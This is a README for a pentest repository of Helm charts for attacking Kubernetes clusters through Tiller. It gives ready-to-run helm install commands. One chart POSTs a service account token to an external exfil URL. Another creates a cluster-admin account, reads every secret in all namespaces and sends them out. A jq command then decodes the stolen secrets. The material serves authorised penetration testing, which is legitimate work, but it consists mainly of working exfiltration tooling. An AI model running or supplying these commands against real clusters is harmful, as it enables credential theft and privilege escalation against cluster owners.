About
These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.
For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/
Charts
To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:
$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]
exfil_sa
This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account who's token you'd like to steal. It takes the following values:
name
- the name of the release, job and pod.serviceAccountName
- the service account to use (and therefore the token that will be exfil'd)exfilURL
- the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)namespace
- defaults to kube-system, but you can override it
Usage:
helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token
This will POST the token in the body of an HTTP request to exfilURL
.
To clean up: helm delete --purge <release_name>
exfil_secrets
This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL
.
It takes the following values:
name
- the name of the release, job and pod.serviceAccountName
- the service account to use (and therefore the token that will be exfil'd)exfilURL
- the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)namespace
- defaults to kube-system, but you can override it
Usage:
helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets
This will POST every Kubernetes secret in JSON form to the exfilURL
. To parse through and quickly decode all the secrets, you can use jq:
cat all_secrets.json| jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'
To clean up: helm delete --purge <release_name>